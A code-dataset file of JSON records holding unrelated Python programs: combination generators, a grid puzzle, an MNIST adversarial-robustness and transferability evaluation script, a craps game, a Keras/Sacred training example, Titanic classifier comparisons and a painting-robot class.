max_length = len(symbols)\n\n    for length in range(1, max_length + 1):\n        for word in map(''.join, combinations(symbols, length)):\n            print (word)\n\ndef random5():\n    from itertools import combinations, product\n\n    symbols = (\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n               \"abcdefghijklmnopqrstuvwxyz\"\n               \"0123456789\")\n    max_length = len(symbols)\n\n    # generator of all combinations\n    def words1(chars=symbols, max_len=max_length):\n        for length in range(1, max_length + 1):\n            for word in map(''.join, combinations(symbols, length)):\n                yield word\n\n    # generator of all combinations allowing repetitions\n    def words2(chars=symbols, max_len=max_length):\n        for length in range(1, max_length + 1):\n            for word in map(''.join, product(*[symbols]*length)):\n                yield word\n\n\n    for word in words1(): #or words2\n        #do something with word\n        print (word)\n\ndef main():\n    random5()\n\nif __name__ == '__main__':\n    main()\n","sub_path":"combinations of string symbols.py","file_name":"combinations of string symbols.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"140571069","text":"def find_distance_dfs(grid, i, j, rows, columns, dist, tracker):\n    if (i, j) in tracker:\n        return dist[i][j]\n    if min(i, j) < 0 or i >= rows or j >= columns:\n        return float('inf')\n    if dist[i][j] != float('inf'):\n        return dist[i][j]\n    tracker.add((i, j))\n    min_d = min(find_distance_dfs(grid, i+1, j, rows, columns, dist, tracker),\n                find_distance_dfs(grid, i, j + 1, rows,\n                                  columns, dist, tracker),\n                find_distance_dfs(grid, i-1, j, rows, columns, dist, tracker),\n                find_distance_dfs(grid, i, j-1, rows, columns, dist, tracker)) + 1\n    dist[i][j] = min_d\n    return min_d\n\n\ndef minimumDays(rows, columns, grid):\n    # WRITE YOUR CODE HERE\n    dist = [[float('inf') for _ in range(columns)] for _ in range(rows)]\n\n    for i in range(rows):\n        for j in range(columns):\n            if grid[i][j] == 1:\n                # dist[i][j] = 1\n                dist[i][j] = 0\n    result = []\n    remaining = []\n    for i in range(rows):\n        for j in range(columns):\n            if grid[i][j] == 0 and dist[i][j] == float('inf'):\n                
find_distance_dfs(grid, i, j, rows, columns, dist, set())\n\n print(dist)\n return max([max(x) for x in dist])\n\n\nprint(minimumDays(5, 5, [[1, 0, 0, 0, 0], [0, 1, 0, 0, 0], [\n 0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]]))\n","sub_path":"Python_Projects/6-Google codejam/139_find_min_days.py","file_name":"139_find_min_days.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"211783153","text":"import sys\nsys.path.append('.')\n\nimport os\nimport time\nimport setproctitle\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nimport cleverhans\nfrom cleverhans.attacks import CarliniWagnerL2\nfrom cleverhans.attacks import ProjectedGradientDescent\nfrom cleverhans.attacks import FastGradientMethod\nfrom cleverhans.model import CallableModelWrapper\nfrom cleverhans.utils import AccuracyReport\nfrom cleverhans.utils_pytorch import convert_pytorch_model_to_tf\n\n\nfrom examples.transfer_mnist import select_model, argparser\nfrom convex_adversarial import robust_loss, robust_loss_transfer\nimport examples.problems as pblm\nfrom examples.trainer import AverageMeter\n\n\nDEBUG = False\nparams = {\n 'cuda_ids': 1,\n 'batch_size': 128,\n 'robust_batch_size': 50,\n 'robust_transfer_batch_size': 30,\n 'actual_attack_batch_size': 400\n}\n\nCW_LEARNING_RATE = .2\nCW_ATTACK_ITERATIONS = 100\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\n\n## -------\n\n\n\ndef evaluate(loader, model, apply_func, log, verbose):\n batch_time = AverageMeter()\n losses = AverageMeter()\n errors = AverageMeter()\n\n end = time.time()\n\n for i, (X,y) in enumerate(loader):\n X,y = X.cuda(), y.cuda().long()\n if apply_func is not None:\n X,y = apply_func(model, X, y)\n if y.dim() == 2:\n y = y.squeeze(1)\n\n with torch.no_grad():\n out = model(Variable(X))\n ce = nn.CrossEntropyLoss()(out, Variable(y))\n err = (out.max(1)[1] != y).float().sum() / X.size(0)\n\n # measure accuracy and record loss\n losses.update(ce.item(), X.size(0))\n errors.update(err.item(), X.size(0))\n\n # measure elapsed time\n batch_time.update(time.time()-end)\n end = time.time()\n\n # print(i, ce.item(), err.item(), file=log)\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Error {errors.val:.3f} ({errors.avg:.3f})'.format(\n i, len(loader), batch_time=batch_time,\n loss=losses, errors=errors), end=endline)\n log.flush()\n\n del X, y, out, ce, err\n if DEBUG and i == 10:\n break\n return losses.avg, errors.avg\n\n\ndef evaluate_robust(loader, model, epsilon, log, verbose):\n batch_time = AverageMeter()\n robust_losses = AverageMeter()\n robust_errors = AverageMeter()\n\n end = time.time()\n\n torch.set_grad_enabled(False)\n for i, (X,y) in enumerate(loader):\n X,y = X.cuda(), y.cuda().long()\n if y.dim() == 2:\n y = y.squeeze(1)\n\n robust_ce, robust_err = robust_loss(model, epsilon, X, y)\n\n # measure accuracy and record loss\n robust_losses.update(robust_ce.item(), X.size(0))\n robust_errors.update(robust_err, X.size(0))\n\n # measure elapsed time\n batch_time.update(time.time()-end)\n end = time.time()\n\n # print(i, robust_ce.item(), robust_err, file=log)\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 
'Robust loss {rloss.val:.3f} ({rloss.avg:.3f})\\t'\n                  'Robust error {rerrors.val:.3f} ({rerrors.avg:.3f})'.format(\n                      i, len(loader), batch_time=batch_time,\n                      rloss = robust_losses, rerrors = robust_errors), end=endline)\n            log.flush()\n\n        del X, y, robust_ce\n        if DEBUG and i == 10:\n            break\n    torch.set_grad_enabled(True)\n    torch.cuda.empty_cache()\n    return robust_losses.avg, robust_errors.avg\n\n\ndef evaluate_transfer_robust(loader, t_model, model, epsilon, adaptive_vp_rate, log, verbose,\n                             real_time=False, evaluate=False, clip_grad=None, **kwargs):\n\n    batch_time = AverageMeter()\n    robust_losses = AverageMeter()\n    robust_errors = AverageMeter()\n    vp_rates = AverageMeter()\n    invp_rates = AverageMeter()\n\n    end = time.time()\n    for i, (X,y) in enumerate(loader):\n        X,y = X.cuda(), y.cuda().long()\n        if y.dim() == 2:\n            y = y.squeeze(1)\n\n        robust_ce, robust_err, _, _, v_point_rate, eta, inv_point_rate = \\\n            robust_loss_transfer(model, t_model, epsilon,\n                                 Variable(X), Variable(y), **kwargs)\n\n        # measure accuracy and record loss\n        robust_losses.update(robust_ce.detach().item(), X.size(0))\n        robust_errors.update(robust_err, X.size(0))\n        vp_rates.update(v_point_rate, X.size(0))\n        invp_rates.update(inv_point_rate, X.size(0))\n\n        # measure elapsed time\n        batch_time.update(time.time()-end)\n        end = time.time()\n\n        # print(i, robust_ce.detach().item(), robust_err, v_point_rate, inv_point_rate, file=log)\n\n        if verbose:\n            endline = '\\n' if i % verbose == 0 else '\\r'\n            print('Test: [{0}/{1}]\\t'\n                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n                  'T Robust loss {rloss.val:.4f} ({rloss.avg:.4f})\\t'\n                  'T Robust error {rerrors.val:.3f} ({rerrors.avg:.3f})\\t'\n                  'VP Rate {vp_rate.val: .3f} ({vp_rate.avg:.3f})\\t'\n                  'INVP Rate {invp_rate.val: .3f} ({invp_rate.avg:.3f})\\t'.format(\n                      i, len(loader), batch_time=batch_time,\n                      vp_rate=vp_rates, invp_rate=invp_rates,\n                      rloss=robust_losses, rerrors=robust_errors), end=endline)\n\n            log.flush()\n\n        del X, y, robust_ce, robust_err\n        if DEBUG and i == 10:\n            break\n    torch.cuda.empty_cache()\n    return robust_losses.avg, robust_errors.avg, vp_rates.avg, invp_rates.avg\n\n\ndef test_transferability(loader, attack_method, epsilon, torch_model1, torch_model2, verbose, batch_size):\n    batch_time = AverageMeter()\n    err11s = AverageMeter()\n    err12s = AverageMeter()\n    err21s = AverageMeter()\n    err22s = AverageMeter()\n\n    end = time.time()\n\n    sess = tf.Session(config=config)\n    x_op = tf.placeholder(tf.float32, shape=(None, 1, 28, 28,))\n\n    # Convert pytorch model to a tf_model and wrap it in cleverhans\n    tf_model_fn1 = convert_pytorch_model_to_tf(torch_model1)\n    if torch_model2 is not None:\n        tf_model_fn2 = convert_pytorch_model_to_tf(torch_model2)\n\n    # Attack Parameters\n    if attack_method == 'CW':\n        params = {'binary_search_steps': 1,\n                  # 'y': None,\n                  'max_iterations': CW_ATTACK_ITERATIONS,\n                  'learning_rate': CW_LEARNING_RATE,\n                  'batch_size': batch_size,\n                  'initial_const': 10}\n    elif attack_method == 'PGD':\n        params = {'eps': epsilon,\n                  'clip_min': 0.,\n                  'clip_max': 1.,\n                  'eps_iter': 0.005,\n                  'nb_iter': 100,\n                  'rand_init': False}\n    elif attack_method == 'FGSM':\n        params = {'eps': epsilon,\n                  'clip_min': 0.,\n                  'clip_max': 1.}\n    else:\n        raise Exception('Unknown attack method {}'.format(attack_method))\n\n    # Model1 --> Model2\n    cleverhans_model1 = CallableModelWrapper(tf_model_fn1, output_layer='logits')\n    if torch_model2 is not None:\n        cleverhans_model2 = CallableModelWrapper(tf_model_fn2, output_layer='logits')\n\n    # Create an attack\n    if attack_method == 'CW':\n        attk1 = 
CarliniWagnerL2(cleverhans_model1, sess=sess)\n if attack_method == 'PGD':\n attk1 = ProjectedGradientDescent(cleverhans_model1, sess=sess)\n if attack_method == 'FGSM':\n attk1 = FastGradientMethod(cleverhans_model1, sess=sess)\n if torch_model2 is not None:\n if attack_method == 'CW':\n attk2 = CarliniWagnerL2(cleverhans_model2, sess=sess)\n if attack_method == 'PGD':\n attk2 = ProjectedGradientDescent(cleverhans_model2, sess=sess)\n if attack_method == 'FGSM':\n attk2 = FastGradientMethod(cleverhans_model2, sess=sess)\n\n adv_x_op1 = attk1.generate(x_op, **params)\n if torch_model2 is not None:\n adv_x_op2 = attk2.generate(x_op, **params)\n\n # Test on model1 and model2\n adv_preds_op11 = tf_model_fn1(adv_x_op1)\n if torch_model2 is not None:\n adv_preds_op12 = tf_model_fn2(adv_x_op1)\n adv_preds_op21 = tf_model_fn1(adv_x_op2)\n adv_preds_op22 = tf_model_fn2(adv_x_op2)\n\n for i, (xs, ys) in enumerate(loader):\n if torch_model2 is not None:\n (adv_preds11, adv_preds12) = sess.run((adv_preds_op11, adv_preds_op12), feed_dict={x_op: xs})\n (adv_preds21, adv_preds22) = sess.run((adv_preds_op21, adv_preds_op22), feed_dict={x_op: xs})\n err11 = float((np.argmax(adv_preds11, axis=1) != ys).sum()) / xs.size(0)\n err12 = float((np.argmax(adv_preds12, axis=1) != ys).sum()) / xs.size(0)\n err21 = float((np.argmax(adv_preds21, axis=1) != ys).sum()) / xs.size(0)\n err22 = float((np.argmax(adv_preds22, axis=1) != ys).sum()) / xs.size(0)\n err11s.update(err11, xs.size(0))\n err12s.update(err12, xs.size(0))\n err21s.update(err21, xs.size(0))\n err22s.update(err22, xs.size(0))\n else:\n adv_preds11 = sess.run((adv_preds_op11), feed_dict={x_op: xs})\n err11 = float((np.argmax(adv_preds11, axis=1) != ys).sum()) / xs.size(0)\n err11s.update(err11, xs.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n\n if verbose:\n endline = '\\n' if i % verbose == 0 else '\\r'\n if torch_model2 is not None:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'error 1->1 {err11.val:.3f} ({err11.avg:.3f})\\t'\n 'error 1->2 {err12.val:.3f} ({err12.avg:.3f})\\t'\n 'error 2->1 {err21.val:.3f} ({err21.avg:.3f})\\t'\n 'error 2->2 {err22.val:.3f} ({err22.avg:.3f})\\t'.format(\n i, len(loader), batch_time=batch_time,\n err11=err11s, err12=err12s, err21=err21s, err22=err22s), end=endline)\n else:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'error {err11.val:.3f} ({err11.avg:.3f})\\t'.format(\n i, len(loader), batch_time=batch_time,\n err11=err11s), end=endline)\n\n sess.close()\n if torch_model2 is not None:\n return err11s.avg, err12s.avg, err21s.avg, err22s.avg\n else:\n return err11s.avg\n\n\ndef test_transferability_subset(loader, attack_method, epsilon, torch_model1, torch_model2, verbose, batch_size):\n batch_time = AverageMeter()\n err12s = AverageMeter()\n err21s = AverageMeter()\n\n end = time.time()\n\n sess = tf.Session(config=config)\n x_op = tf.placeholder(tf.float32, shape=(None, 1, 28, 28,))\n\n # Convert pytorch model to a tf_model and wrap it in cleverhans\n tf_model_fn1 = convert_pytorch_model_to_tf(torch_model1)\n tf_model_fn2 = convert_pytorch_model_to_tf(torch_model2)\n\n # Attack Parameters\n if attack_method == 'CW':\n params = {'binary_search_steps': 1,\n # 'y': None,\n 'max_iterations': CW_ATTACK_ITERATIONS,\n 'learning_rate': CW_LEARNING_RATE,\n 'batch_size': batch_size,\n 'initial_const': 10}\n elif attack_method == 'PGD':\n params = {'eps': epsilon,\n 'clip_min': 0.,\n 
'clip_max': 1.,\n                  'eps_iter': 0.005,\n                  'nb_iter': 100,\n                  'rand_init': False}\n    elif attack_method == 'FGSM':\n        params = {'eps': epsilon,\n                  'clip_min': 0.,\n                  'clip_max': 1.}\n    else:\n        raise Exception('Unknown attack method {}'.format(attack_method))\n\n    # Model1 --> Model2\n    cleverhans_model1 = CallableModelWrapper(tf_model_fn1, output_layer='logits')\n    cleverhans_model2 = CallableModelWrapper(tf_model_fn2, output_layer='logits')\n\n    # Create an attack\n    if attack_method == 'CW':\n        attk1 = CarliniWagnerL2(cleverhans_model1, sess=sess)\n    if attack_method == 'PGD':\n        attk1 = ProjectedGradientDescent(cleverhans_model1, sess=sess)\n    if attack_method == 'FGSM':\n        attk1 = FastGradientMethod(cleverhans_model1, sess=sess)\n\n    if attack_method == 'CW':\n        attk2 = CarliniWagnerL2(cleverhans_model2, sess=sess)\n    if attack_method == 'PGD':\n        attk2 = ProjectedGradientDescent(cleverhans_model2, sess=sess)\n    if attack_method == 'FGSM':\n        attk2 = FastGradientMethod(cleverhans_model2, sess=sess)\n\n    adv_x_op1 = attk1.generate(x_op, **params)\n    adv_x_op2 = attk2.generate(x_op, **params)\n\n    # Test on model1 and model2\n    adv_preds_op11 = tf_model_fn1(adv_x_op1)\n    adv_preds_op12 = tf_model_fn2(adv_x_op1)\n    adv_preds_op21 = tf_model_fn1(adv_x_op2)\n    adv_preds_op22 = tf_model_fn2(adv_x_op2)\n\n    for i, (xs, ys) in enumerate(loader):\n        (adv_preds11, adv_preds12) = sess.run((adv_preds_op11, adv_preds_op12), feed_dict={x_op: xs})\n        (adv_preds21, adv_preds22) = sess.run((adv_preds_op21, adv_preds_op22), feed_dict={x_op: xs})\n        cnt11 = int((np.argmax(adv_preds11, axis=1) != ys).sum())\n        cnt22 = int((np.argmax(adv_preds22, axis=1) != ys).sum())\n        if cnt11 > 0:\n            err12 = float(((np.argmax(adv_preds12, axis=1) != ys) * (np.argmax(adv_preds11, axis=1) != ys)).sum()) / float(cnt11)\n            err12s.update(err12, cnt11)\n        if cnt22 > 0:\n            err21 = float(((np.argmax(adv_preds22, axis=1) != ys) * (np.argmax(adv_preds21, axis=1) != ys)).sum()) / float(cnt22)\n            err21s.update(err21, cnt22)\n\n        # measure elapsed time\n        batch_time.update(time.time() - end)\n        end = time.time()\n\n        if verbose:\n            endline = '\\n' if i % verbose == 0 else '\\r'\n            print('Test: [{0}/{1}]\\t'\n                  'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n                  'error 1->2 {err12.val:.3f} ({err12.avg:.3f})\\t'\n                  'error 2->1 {err21.val:.3f} ({err21.avg:.3f})\\t'.format(\n                      i, len(loader), batch_time=batch_time,\n                      err12=err12s, err21=err21s), end=endline)\n\n    sess.close()\n    return err12s.avg, err21s.avg\n\n\nos.environ['CUDA_VISIBLE_DEVICES'] = str(params['cuda_ids'])\nif __name__ == '__main__':\n\n    args = argparser()\n    model = dict()\n    for m_type in ['M1', 'M1P', 'M2P', 'M2PM', 'M2', 'M2M']:\n        weight_path = None\n        if m_type == 'M1':\n            _psbl_path = args.M1_prefix + '_best.pth'\n        elif m_type == 'M1P':\n            _psbl_path = args.M1P_prefix + '_best.pth'\n        elif m_type == 'M2P':\n            _psbl_path = args.M2P_prefix + '_best.pth'\n        elif m_type == 'M2PM':\n            _psbl_path = args.M2PM_prefix + '_best.pth'\n        elif m_type == 'M2':\n            _psbl_path = args.M2_prefix + '_best.pth'\n        elif m_type == 'M2M':\n            _psbl_path = args.M2_prefix + '_mutual_model_best.pth'\n        if os.path.exists(_psbl_path):\n            model[m_type] = select_model(args.model)\n            model[m_type].load_state_dict(torch.load(_psbl_path)['state_dict'])\n\n    _, test_loader = pblm.mnist_loaders(params['batch_size'])\n    _, robust_test_loader = pblm.mnist_loaders(params['robust_batch_size'])\n    _, robust_transfer_test_loader = pblm.mnist_loaders(params['robust_transfer_batch_size'])\n    _, actual_test_loader = pblm.mnist_loaders(params['actual_attack_batch_size'])\n\n    
res_log = open(args.prefix + '_test.txt', \"w\")\n setproctitle.setproctitle('test_clean_accuracy')\n print('Clean accuracy')\n print('Clean accuracy', file=res_log)\n for k in model:\n losses, errors = evaluate(test_loader, model[k], None, res_log, 10)\n print('\\n')\n print(k, 'loss', losses, 'error', errors)\n print(k, 'loss', losses, 'error', errors, file=res_log)\n\n setproctitle.setproctitle('test_robust_bound')\n print('Robust bound')\n print('Robust bound', file=res_log)\n for k in model:\n losses, errors = evaluate_robust(robust_test_loader, model[k], args.epsilon, res_log, 10)\n print('\\n')\n print(k, 'loss', losses, 'error', errors)\n print(k, 'loss', losses, 'error', errors, file=res_log)\n res_log.flush()\n\n # res_trans_log = open('test.trans.log', \"w\")\n # setproctitle.setproctitle('test_transfer_bound')\n # print('Transfer bound')\n # print('Transfer bound', file=res_trans_log)\n # for e in [0.1, 0.3]:\n # # robust_bound\n # m1 = model_set[('N', e)]\n # for t in ['NP', 'T', 'TB']:\n # m2 = model_set[(t, e)]\n # losses, errors, vprates, invprates = evaluate_transfer_robust(robust_transfer_test_loader, m1, m2, e, None, res_trans_log, 10)\n # print(t, e, losses, errors, vprates, invprates, file=res_trans_log)\n # res_trans_log.flush()\n\n res_attack_log = open(args.prefix + '_test.attack.txt', \"w\")\n setproctitle.setproctitle('actual_white_attack')\n print('actual_white_attack', file=res_attack_log)\n print('actual_white_attack')\n for attack_method in ['FGSM', 'PGD']:\n print(attack_method)\n print(attack_method, file=res_attack_log)\n for k in model:\n m = model[k]\n err = test_transferability(actual_test_loader, attack_method, args.epsilon, m, None, 10,\n params['actual_attack_batch_size'])\n print(k, attack_method, 'err', err)\n print(k, attack_method, 'err', err, file=res_attack_log)\n setproctitle.setproctitle('actual_transfer_attack')\n print('actual_transfer_attack', file=res_attack_log)\n print('actual_transfer_attack')\n for attack_method in ['FGSM', 'PGD']:\n print(attack_method)\n print(attack_method, file=res_attack_log)\n appeared = set()\n for s, t in [('M1', 'M1P'), ('M2P', 'M2PM'), ('M2', 'M2M')]:\n # for s in model:\n # for t in model:\n if s == t:\n break\n # if (s, t) in appeared and (t, s) in appeared:\n # break\n m1 = model[s]\n m2 = model[t]\n _, err12, err21, _ = test_transferability(actual_test_loader, attack_method, args.epsilon, m1, m2, 10,\n params['actual_attack_batch_size'])\n print(attack_method, s, '->', t, err12, t, '->', s, err21)\n print(attack_method, s, '->', t, err12, t, '->', s, err21, file=res_attack_log)\n err12, err21 = test_transferability_subset(actual_test_loader, attack_method, args.epsilon, m1, m2, 10,\n params['actual_attack_batch_size'])\n\n print(attack_method, 'subset', s, '->', t, err12, t, '->', s, err21)\n print(attack_method, 'subset', s, '->', t, err12, t, '->', s, err21, file=res_attack_log)\n appeared.add((s, t))\n appeared.add((t, s))\n res_attack_log.flush()\n\n # res_trans_bound_log = open('test.trans.rev.log', \"w\")\n # setproctitle.setproctitle('test_transfer_bound_rev')\n # print('Transfer bound Rev')\n # print('Transfer bound Rev', file=res_trans_bound_log)\n # for e in [0.1, 0.3]:\n # # robust_bound\n # m1 = model_set[('N', e)]\n # for t in ['NP', 'T', 'TB']:\n # m2 = model_set[(t, e)]\n # losses, errors, vprates, invprates = evaluate_transfer_robust(robust_transfer_test_loader, m2, m1, e, None, res_trans_bound_log, 10)\n # print(t, 'N', e, losses, errors, vprates, invprates, file=res_trans_bound_log)\n # 
res_trans_bound_log.flush()\n\n","sub_path":"test/transfer_test.py","file_name":"transfer_test.py","file_ext":"py","file_size_in_byte":20050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"237860045","text":"\"\"\"\nCraps gambling game:\nThe player rolls two dice with faces 1-6.\nIf the first roll sums to 7 or 11, the player wins;\nif the first roll sums to 2, 3 or 12, the player loses.\nFor any other sum, record the first sum and keep rolling\nuntil a roll matches the first sum, in which case the player wins;\nif a 7 comes up before that, the player loses.\n\"\"\"\nimport random\nimport math\ndef crapsrandom():\n    x = math.floor(random.random() *10) + 1\n    while x > 6:\n        x = math.floor(random.random() *10) + 1\n    return x\ndef carpsgame():\n    a = crapsrandom()\n    b = crapsrandom()\n    first_sum = a + b\n    if first_sum == 7 or first_sum == 11:\n        print('You win! You rolled %d and %d, for a total of %d'%(a,b,first_sum))\n    elif first_sum == 2 or first_sum == 3 or first_sum == 12:\n        print('You lose! You rolled %d and %d, for a total of %d'%(a,b,first_sum))\n    else:\n        count = 1\n        while count >= 1:\n            x = crapsrandom()\n            y = crapsrandom()\n            if x + y == 7:\n                print('Roll %d: you rolled %d,%d - you lose! Your first roll was %d,%d, for a total of %d'%(count,x,y,a,b,first_sum))\n                break\n            elif x + y == first_sum:\n                print('Roll %d: you rolled %d,%d - you win! Your first roll was %d,%d, for a total of %d'%(count,x,y,a,b,first_sum))\n                break\n            else:\n                print('Roll %d: you rolled %d,%d - no decision yet! Your first roll was %d,%d, for a total of %d'%(count,x,y,a,b,first_sum))\n                count += 1\n                continue\nif __name__ == '__main__':\n    carpsgame()\n\n","sub_path":"python100days/day002/crapsgame.py","file_name":"crapsgame.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"214518154","text":"import tensorflow as tf\nfrom tensorflow import placeholder\nfrom tensorflow.examples.tutorials.mnist import \\\n    input_data\n\nfrom keras import backend as K\nfrom keras.layers import Dense\nfrom keras.objectives import categorical_crossentropy\nfrom keras.metrics import categorical_accuracy\n\nimport sacred\n\n\nex = sacred.Experiment()\n\n\n@ex.config\ndef cfg():\n    hidden_units = 512\n    batch_size = 32\n    nr_epochs = 100\n    optimizer = 'sgd'\n    learning_rate = 0.1\n    log_dir = 'log/NN{}'.format(hidden_units)\n\n\n@ex.capture\ndef build_model(hidden_units):\n    img = placeholder(tf.float32, shape=(None, 784))\n    label = placeholder(tf.float32, shape=(None, 10))\n\n    h = Dense(hidden_units, activation='relu')(img)\n    preds = Dense(10, activation='softmax')(h)\n\n    loss = tf.reduce_mean(\n        categorical_crossentropy(label, preds))\n    accuracy = tf.reduce_mean(\n        categorical_accuracy(label, preds))\n\n    return img, label, loss, accuracy\n\n\n@ex.capture\ndef set_up_optimizer(loss, optimizer, learning_rate):\n    OptClass = {\n        'sgd': tf.train.GradientDescentOptimizer,\n        'adam': tf.train.AdamOptimizer}[optimizer]\n    opt = OptClass(learning_rate=learning_rate)\n    return opt.minimize(loss)\n\n\n@ex.automain\ndef main(batch_size, nr_epochs, log_dir, _run):\n    sess = tf.Session()\n    K.set_session(sess)\n\n    mnist = input_data.read_data_sets('MNIST_data',\n                                      one_hot=True)\n\n    img, label, loss, acc = build_model()\n    train_step = set_up_optimizer(loss)\n\n    init_op = tf.global_variables_initializer()\n    sess.run(init_op)\n\n    summary_writer = tf.summary.FileWriter(log_dir)\n    summary_writer.add_graph(tf.get_default_graph())\n\n    for epoch in range(nr_epochs):\n        batch = mnist.train.next_batch(batch_size)\n        _, l, a = sess.run([train_step, loss, acc],\n                           feed_dict={label: batch[1],\n                                      img: batch[0]})\n\n        _run.log_scalar("train.cross_entropy", l)\n        _run.log_scalar("train.accuracy", a, epoch)\n        print(epoch, a, l)\n\n    return sess.run(acc, feed_dict={\n        img: mnist.test.images,\n        label: 
mnist.test.labels})\n","sub_path":"papers/klaus_greff/kerasexample.py","file_name":"kerasexample.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"132618400","text":"# # data analysis and wrangling\nimport pandas as pd\n# import numpy as np\n# import random as rnd\n\n# visualization\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n#matplotlib inline\n\n# machine learning\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import Perceptron\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\n\nclass Model(object):\n def __init__(self, combine):\n self.combine = combine\n train_df = combine[0]\n test_df = combine[1]\n self.X_train = train_df.drop(\"Survived\", axis=1)\n self.Y_train = train_df[\"Survived\"]\n self.X_test = test_df.drop(\"PassengerId\", axis=1).copy()\n\n def main(self):\n self.logistic_regression()\n self.svm()\n self.knn()\n self.gaussian_naive_bayes()\n self.perceptron()\n self.random_forest()\n\n def logistic_regression(self):\n print(\"logistic regression beginning\")\n\n logreg = LogisticRegression()\n logreg.fit(self.X_train, self.Y_train)\n Y_pred = logreg.predict(self.X_test)\n\n coeff_df = pd.DataFrame(self.combine[0].columns.delete(0))\n coeff_df.columns = ['Feature']\n coeff_df[\"Correlation\"] = pd.Series(logreg.coef_[0])\n # print(coeff_df.sort_values(by='Correlation', ascending=False))\n\n acc_log = round(logreg.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"logistic regression done with {acc_log}% accuracy\")\n return Y_pred\n\n def svm(self):\n print(\"support vector machines beginning\")\n svc = SVC()\n svc.fit(self.X_train, self.Y_train)\n Y_pred = svc.predict(self.X_test)\n acc_svc = round(svc.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"support vector machines done with {acc_svc}% accuracy\")\n return Y_pred\n\n def knn(self):\n print(\"knn beginning\")\n knn = KNeighborsClassifier(n_neighbors=3)\n knn.fit(self.X_train, self.Y_train)\n Y_pred = knn.predict(self.X_test)\n acc_knn = round(knn.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"knn with {acc_knn}% accuracy\")\n return Y_pred\n\n def gaussian_naive_bayes(self):\n print(\"gaussian naive bayes beginning\")\n gaussian = GaussianNB()\n gaussian.fit(self.X_train, self.Y_train)\n Y_pred = gaussian.predict(self.X_test)\n acc_gaussian = round(gaussian.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"gaussian naive bayes done with {acc_gaussian}% accuracy\")\n return Y_pred\n\n def perceptron(self):\n print(\"perceptron beginning\")\n perceptron = Perceptron()\n perceptron.fit(self.X_train, self.Y_train)\n Y_pred = perceptron.predict(self.X_test)\n acc_perceptron = round(perceptron.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"perceptron done with {acc_perceptron}% accuracy\")\n return Y_pred\n\n def random_forest(self):\n print(\"random forest beginning\")\n random_forest = RandomForestClassifier(n_estimators=100)\n random_forest.fit(self.X_train, self.Y_train)\n Y_pred = random_forest.predict(self.X_test)\n random_forest.score(self.X_train, self.Y_train)\n acc_random_forest = round(random_forest.score(self.X_train, self.Y_train) * 100, 2)\n print(f\"random forest done with {acc_random_forest}% 
accuracy\")\n        return Y_pred","sub_path":"titanic/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}
{"seq_id":"309466611","text":"from collections import deque\n\n\nclass Robot:\n    black = 0\n    white = 1\n    left = 0\n    right = 1\n\n    def __init__(self):\n        self.painting = dict()\n        self.x, self.y = 0, 0\n        self.changes = 0\n        self.moves = 0\n        self.directions = deque([(0, -1), (-1, 0), (0, 1), (1, 0)])\n\n    def get_color(self):\n        return self.painting.get((self.x, self.y), Robot.black)\n\n    def move(self, turn):\n        self.moves += 1\n        if turn == self.left:\n            self.directions.rotate(-1)\n        else:\n            self.directions.rotate(1)\n        self.x += self.directions[0][0]\n        self.y += self.directions[0][1]\n\n    def paint(self, color):\n        if (self.x, self.y) not in self.painting.keys() and color == self.white:\n            self.changes += 1\n        self.painting[(self.x, self.y)] = color\n\n    def get_changes(self):\n        return self.changes\n\n    def get_text_picture(self):\n        min_x = min((x[0] for x in self.painting.keys()))\n        min_y = min((x[1] for x in self.painting.keys()))\n        max_x = max((x[0] for x in self.painting.keys()))\n        max_y = max((x[1] for x in self.painting.keys()))\n\n        picture = [ [\" \" for x in range(0,max_x-min_x+1)] for y in range(0,max_y-min_y+1)]\n        for coords, color in self.painting.items():\n\n            if color == Robot.white:\n                # offset by the minimum coordinates so the top-left painted cell maps to index (0, 0)\n                picture[coords[1]-min_y][coords[0]-min_x] = \"#\"\n\n        return 